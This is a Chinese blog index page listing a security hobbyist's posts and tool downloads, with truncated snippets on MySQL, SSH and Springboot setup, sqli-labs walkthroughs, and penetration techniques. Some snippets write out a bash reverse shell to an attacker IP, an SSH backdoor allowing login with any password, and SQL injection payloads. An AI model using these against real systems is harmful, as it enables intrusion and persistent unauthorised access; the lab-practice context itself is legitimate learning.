自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(103)
  • 资源 (10)
  • 收藏
  • 关注

原创 dns隧道攻击

dns隧道攻击

2022-06-10 15:43:36 1427 2

原创 icmp隧道工具之ptunnel使用

ptunnel工具使用

2022-06-10 09:34:20 804

原创 (wps)表格下拉选择多个选项

2022-06-02 10:16:50 48393 30

原创 反弹shell

一、通过bash反弹shell1、 在攻击机上通过nc命令监听2222端口┌──(kali㉿kali)-[~/Desktop]└─$ nc -lvvp 2222listening on [any] 2222 ...2、在服务器上连接攻击机(192.168.137.131)上面监听的2222端口[root@localhost netcat-0.7.1]# bash -i >& /dev/tcp/192.168.137.131/2222 0>&13、连..

2022-05-11 15:41:31 1609

原创 ssh免密登录配置

1、在客户端机器上生成密钥,这里连续三个回车默认即可。[root@localhost ~]# ssh-keygen -t rsaGenerating public/private rsa key pair.Enter file in which to save the key (/root/.ssh/id_rsa): Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identific.

2022-05-10 16:18:38 7235 1

转载 通过SSH留后门(创建ssh软链接)

一、判断sshd_config配置中的UsePAM参数是否为yescat /etc/ssh/sshd_config二、确认对应的pam配置文件是否包含auth sufficient pam_rootok.so配置,只在包含这件配置才可以通过ssh任意密码登录。三、通过命令创建后门软链接,通过查看端口己监听。ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=12345netstat -antlp四、通过另一台机器ssh进行任意密码登

2022-05-10 11:06:14 2128

原创 Springboot+camunda+mysql(一)

41、springboot(2.5.10)用的是快速开发框架若依(www.ruoyi.vip)方便快速集成测试。2、camunda用的7.15.0,这里的版本不能随意用,根据官网对应的配置要求,不同的springboot版本对应不同的camunda版本。官网地址:Spring Boot Version Compatibility | docs.camunda.org3、在项目pom.xml中添加camunda的依赖,我这里用的是7.16.0的版本<properties>.

2022-03-25 15:35:06 2339 1

转载 Linux安装clamav(本文转载:https://blog.csdn.net/qq_39564555/article/details/123300014)

1、官网下载地址:https://www.clamav.net/downloads​wgethttps://www.clamav.net/downloads/production/clamav-0.104.2.linux.x86_64.rpm2、安装rpm -ivh --prefix=/usr/local/clamav clamav-0.104.2.linux.x86_64.rpm3、添加用户组及创建用户groupadd clamavuseradd -g clamav cl.

2022-03-22 16:15:00 819 1

原创 sqli-labs靶场Less-23 注释绕过

这里过滤掉了 # 和 -- ,所以这里第一条件就是要让union前面的条件失效,第二就是通过结尾的and '1'='1 进行绕过?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() and '1'='1...

2021-08-27 16:22:14 249

原创 sqli-labs靶场Less-20~22 Cookie注入

cookie注入的内容一定要进行url编码admin%27%20and%201%3D2%20union%20select%201%2Cdatabase()%2Cversion()--%20qwe解码后admin' and 1=2 union select 1,database(),version()-- qwe

2021-08-27 10:12:15 198

原创 sqli-labs靶场Less-19

POST /sqlilabs/Less-19/ HTTP/1.1Host: 192.168.60.142:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN.

2021-08-27 09:42:05 169

原创 sqli-labs靶场Less-18

POST /sqlilabs/Less-18/ HTTP/1.1Host: 192.168.60.142:8080User-Agent: ',updatexml(1,concat(0x7e,(select database())),1),1)-- qweAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0..

2021-08-27 09:11:26 106

原创 sqli-labs靶场Less-17

1、访问首页,/Less-17/index.php,这里的传参点是表单中的uname、passwd判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合 结合1~5判断是否存在延时注入 结合1~5判断是否存在报错注入(假设查询语句没错,代码中的其它语句可以报错) 结合1~5判断是否存在head注入 ' and updatexml(1,concat(0x7e,(select database(...

2021-08-26 17:13:39 131

原创 sqli-labs靶场Less-16

1、访问首页,/Less-16/index.php,这里的传参点是表单中的uname、passwd判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合 如果以上都不适:哪以上规则都同时加上sleep测试一遍,看是不是存在延时注入2、判断字段数admin") order by 2-- qwe3、判断数据库长度-- 盲注admin") and length(database())=8-- ...

2021-08-26 16:26:14 98

原创 sqli-labs靶场Less-15

1、访问首页,/Less-15/index.php,这里的传参点是表单中的uname、passwd判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合 如果以上都不适:哪以上规则都同时加上sleep测试一遍,看是不是存在延时注入分析:这里同时存在布尔型(延时)注入,哪这里可以使用盲注 或 延时盲注来做这个题。2、使用盲注获取数据库长度-- 盲注admin' and length(databa...

2021-08-26 11:23:58 217

原创 sqli-labs靶场Less-14

1、访问首页,/Less-14/index.php,这里的传参点是表单中的uname、passwd探测六步判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合 判断是否是延时盲注2、使用报错注入获取库名" and updatexml(1,concat(0x7e,(select database())),1) -- qwe3、获取表名 " and updatexml(1,concat(0x7e,...

2021-08-25 17:00:47 106

原创 sqli-labs靶场Less-13

1、访问首页,/Less-13/index.php,这里的传参点是表单中的uname、passwd探测六步判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合 判断是否是延时盲注分析:这里是单引号+括号闭合,但这里正确时并没有显示点,但在探测过程中会报SQL语名错误的内容,所以这里判断可以用报错注入。2、尝试使用报错注入admin') and updatexml(1,concat(0x7e,(select .

2021-08-25 16:37:54 129

原创 sqli-labs靶场Less-12

1、访问首页,/Less-12/index.php,这里的传参点是表单中的uname、passwd探测六步判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合 判断是否是延时盲注2、通过在uname后面拼接参数 order by 1~3 ,如下图3的时候提示没有3个字段,只有2个。admin") order by 3-- qwe3、查看SQL结果显示点") union select 1,2-- ..

2021-08-25 16:27:37 243

原创 sqli-labs靶场Less-11

1、访问首页,/Less-10/index.php,这里的传参点是表单中的uname、passwd探测六步判断是否是数字形传参 判断是否有单引号闭合 admin' -- qwe 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合 判断是否是延时盲注分析:这里是通过单引号闭合,注释掉后面的SQL直接绕过登录2、通过在uname后面拼接参数 order by 1~3 ,如下图3的时候提示没有3个字段,只有2个。3、通过uni...

2021-08-25 15:43:53 125

原创 sqli-labs靶场Less-10

1、访问首页,/Less-10/index.php?id=1,这里的传参点是id探测六步判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合 判断是否是延时盲注http://192.168.60.142:8080/sqlilabs/Less-10/index.php?id=1' and sleep(10)-- qwe分析:这里使用的是双引号闭合+延时盲注,和第9关一样的操作,只是闭合不一样。2、使用 i..

2021-08-25 14:52:27 321

原创 sqli-labs靶场Less-9

1、访问首页,/Less-9/index.php?id=1,这里的传参点是id探测六步判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合 判断是否是延时盲注http://192.168.60.142:8080/sqlilabs/Less-9/index.php?id=1' and sleep(10)-- qwe分析:通过测试,这里是通过单引号闭合,同时使用延时注入才生效,哪么在以后SQL注入探测时,当前面5.

2021-08-25 10:34:23 140

原创 sqli-labs靶场Less-8

1、访问首页,/Less-8/index.php?id=1,这里的传参点是id探测五步判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合分析:这里是单引号闭合,且这里输错SQL语句没有报错和提示,只是不展示数据而己。哪么这里能用到的方式与第7关一样,2、判断字段数量http://192.168.60.142:8080/sqlilabs/Less-8/index.php?id=1' order b..

2021-08-23 16:13:02 206

原创 sqli-labs靶场Less-7

备注:虽然从首页进来就知道是dump into outfile但我还是假设按不知道的流程来一步步尝试,这样才会印象深刻,不然我觉得失去练习的意义了。1、访问首页,/Less-7/index.php?id=1,这里的传参点是id探测五步判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合这里我还是按原因来的先探测五步走一遍,结果发现只有两种结果如下:结果1:结果2:分析:这里我尝试不管是怎么样,通过...

2021-08-21 16:59:25 319

原创 sqli-labs靶场Less-6

1、访问首页,/Less-6/index.php?id=1,这里的传参点是id探测五步曲判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合http://192.168.21.144:8080/sqlilabs/Less-6/index.php?id=1" and 1=2-- qwe2、存在SQL注入,但是这里不存在回显点,故意输出错误的SQL,看页面是否报错,如果报错有回显哪么就可以使用报错注入,如果报错也没有.

2021-08-21 13:33:30 148

原创 sqli-labs靶场Less-5

1、访问首页,/Less-5/index.php?id=1,这里的传参点是id探测五步曲判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合搬出自己准备好的5步曲......好尴尬......慢慢有点难度了哟结论:通过单引号闭合, 再用and 1=1 与 and 1=2控制条件,发现即不报错又能控制显示的文字。2、判断字段数量http://192.168.60.142:8080/sqlilabs/L..

2021-08-20 17:22:46 193

原创 sqli-labs靶场Less-4

1、访问首页,/Less-4/index.php?id=1,这里的传参点是id 探测五步曲判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合结论:通过以上判断,该注入点是由 ") 双引号加括号闭合的。2、判断字段数量http://192.168.60.142:8080/sqlilabs/Less-4/index.php?id=1") order by 4-- qwe通过以上or...

2021-08-20 15:23:25 66

原创 sqli-labs靶场Less-3

1、访问首页,index.php?id=1,这里的传参点是id2、判断注入点是数字还是字符,如果是字符就需要闭合and 1=1-- qweand 1=2-- qwe分析:通过以上探测发现并不起效果,考虑是不是和第一关一样需要单引号闭合,再次尝试' and 1=1-- qwe分析:通过单引号闭合发现报错了,难道是双引号闭合?再次尝试分析:尴尬了,单双引号都不行?对于初学者的我,一下子脑子短路了,于是翻了一下源代码,一下突然惊醒,还有括号没试,还是不细心呀..

2021-08-20 15:03:49 338

原创 sqli-labs靶场Less-2

1、访问首页,index.php?id=1,这里的传参点是id2、判断注入点是数字还是字符,如果是字符就需要闭合and 1=1-- qweand 1=2-- qwe从以上探测来看,传参是用的数字3、判断字段数量通过以上order by 1~4 最后order by 4 时报错,说明一共有3个字段4、查询回显点 ?id=1 and 1=2 union select 1,2,3-- qwe注意:和less-1一样,要么把union前面参数值改大,要么...

2021-08-20 10:29:16 151

原创 sqli-labs靶场Less-1

1、访问首页,index.php?id=1,这里的传参点是id2、判断是否在SQL注入and 1=1-- qweand 1=2-- qwe分析:从以上两种探测形式来看,and 1=1 和 and 1=2并没有影响结果,难道不存在SQL注入?当然不可能,这是靶场SQL注入肯定是存在的.----------------------------------------------------往下看-----------------------------------------

2021-08-19 17:41:28 167

原创 docker搭建sqli-labs靶场

1、启动docker[root@localhost ~]# service docker start Redirecting to /bin/systemctl start docker.service2、搜索sqli-labs镜像[root@localhost ~]# docker search sqli-labsNAME DESCRIPTION STARS OF

2021-08-19 10:42:48 557

原创 kali安装awvs

http://127.0.0.1/mutillidae/database-offline.php

2021-08-18 17:22:03 1955

原创 kali通过msf利用永恒之蓝攻击服务器

1、通过命令“msfconsole”启动msf,或者通过菜单启动msfmsf模块说明:exploits:攻击模块,利用发现的安全漏洞或配置弱点对远程目标系统进行攻击,从而获得对远程目标系统访问权限 的代码组件。auxiliary:辅助模块,为渗透测试信息搜集提供了大量的辅助模块支持,如负责扫描、收集、嗅探、指纹识别、口令猜测等。payloads:攻击载荷模块,攻击成功后促使靶机运行的一段植入代码。post:后渗透攻击模块,收集更多信息或进一步访问被利用的目标系统。encoders

2021-04-30 11:08:22 5469 3

原创 linux搭建selenium+chrome运行环境

1、安装chromeyum install https://dl.google.com/linux/direct/google-chrome-stable_current_x86_64.rpm2、安装支持库yum install mesa-libOSMesa-devel gnu-free-sans-fonts wqy-zenhei-fonts3、查看google-chrome版本google-chrome --version3、安装chromedriver注意,chromedrive

2021-04-13 09:22:28 488

原创 kali安装DVWA

kali@kali:~$ whereis mysqlmysql: /usr/bin/mysql /etc/mysql /usr/share/mysql /usr/share/man/man1/mysql.1.gzkali@kali:~$ whereis apache2apache2: /usr/sbin/apache2 /usr/lib/apache2 /etc/apache2 /usr/share/apache2 /usr/share/man/man8/apache2.8.gzkali...

2021-01-08 17:00:53 10853

原创 kali安装chrome

1、下载官网地址:https://www.chrome64bit.com/index.php/google-chrome-64-bit-for-linux但这里可以直接wget下载,免去共享文件去传到kali虚机中,更文件。wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb2、使用 sudo dpkg -igoogle-chrome-stable_current_amd6...

2020-12-21 20:50:43 595

原创 VMware下设置Kali访问本机共享文件夹

1、虚拟机-->设置-->选项 (打开虚拟机设置)2、执行安装vm-tolls命令sudo apt-get install open-vm-tools-desktop fusekali@kali:~$ sudo apt-get install open-vm-tools-desktop fuse正在读取软件包列表... 完成正在分析软件包的依赖关系树 正在读取状态信息... 完成 fuse 已经是最新版 (2.9.9-3)。建议安...

2020-12-21 11:15:43 3025

原创 kali安装蚁剑

1、下载下载地址:https://github.com/AntSwordProject/2、安装

2020-09-08 09:27:17 5986 4

原创 kali系统汉化

sudo apt-get updatesudo apt-get install ttf-wqy-microhei ttf-wqy-zenhei xfonts-wqysudo dpkg-reconfigure locales

2020-09-05 16:06:20 267

原创 Mysql 连接数据库 1251 错误

1、mysql8以前的版本加密规则是mysql_native_password,而mysql8之后的加密规则是caching_sha2_password,所以造成了命令连接正常,而用native连接失败。2、修改数据库加密方式,注意因为在之前修改了远程连接,所以这里条件是 root@% 否则这里%要替换成localhostmysql> use mysql;Database changedmysql> ALTER USER 'root'@'%' IDENTIFIED BY ...

2020-08-24 16:45:11 1624 1

原创 Mysql 8.X 安装步骤

1、下载#用wget慢 ,而且下载下来的文件解压有异常,推荐直接用讯雷下载,这里我己下载好上传了,可直接用。wget https://dev.mysql.com/get/Downloads/MySQL-8.0/mysql-8.0.11-linux-glibc2.12-i686.tar.gz2、解压到/usr/local目录tar -zxvf mysql-8.0.11-linux-glibc2.12-i686.tar.gz -C /usr/local3、进入/usr/local目录

2020-08-24 12:28:38 203

xlsx wps自定义下拉框模板

xlsx wps自定义下拉框模板

2022-09-06

awvs13-linux.zip

WVS(Web Vulnerability Scanner)是一个自动化的Web应用程序安全测试工具,它可以扫描任何可通过Web浏览器访问的和遵循HTTP/HTTPS规则的Web站点和Web应用程序。适用于任何中小型和大型企业的内联网、外延网和面向客户、雇员、厂商和其它人员的Web网站。WVS可以通过检查SQL注入攻击漏洞、跨站脚本攻击漏洞等来审核Web应用程序的安全性。 它可以扫描任何可通过Web浏览器访问的和遵循HTTP/HTTPS规则的Web站点和Web应用程序。

2020-09-05

mysql-8.0.11-linux-glibc2.12-i686.tar.gz

mysql-8.0.11-linux-glibc2.12-i686.tar.gz 数据库 mysql-8.0.11-linux-glibc2.12-i686.tar.gz 数据库

2020-08-24

7kbscan-WebPathBrute-master.zip

7kbscan-WebPathBrute Web路径暴力探测工具

2020-04-15

Nessus-8.10.0-x64.zip

Nessus 是目前全世界最多人使用的系统漏洞扫描与分析软件。总共有超过75,000个机构使用Nessus 作为扫描该机构电脑系统的软件。

2020-04-14

nmap-7.80-setup.zip

nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统(这是亦称 fingerprinting)。它是网络管理员必用的软件之一,以及用以评估网络系统安全。 正如大多数被用于网络安全的工具,nmap 也是不少黑客及骇客(又称脚本小子)爱用的工具 。系统管理员可以利用nmap来探测工作环境中未经批准使用的服务器,但是黑客会利用nmap来搜集目标电脑的网络设定,从而计划攻击的方法。 Nmap 常被跟评估系统漏洞软件Nessus 混为一谈。Nmap 以隐秘的手法,避开闯入检测系统的监视,并尽可能不影响目标系统的日常操作。

2020-04-13

zull-gateway.zip

springcloud zull 网关配置(路由配置,限流配置)

2019-07-26

goeclipse 所需要的三个文件 godef.exe gocode.exe guru.exe

goeclipse 所需要的三个文件 godef.exe gocode.exe guru.exe

2018-01-07

JAVA调用Webservice接口Demo

JAVA调用Webservice接口Demo 直接上代码,下载下来可直接运行看到效果 1,IP查询 2,根据省份查城市

2013-05-09

java串口配置说细的说明文档

java串口配置详细说明文档,有多种方法,大家看哦!

2010-11-25

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除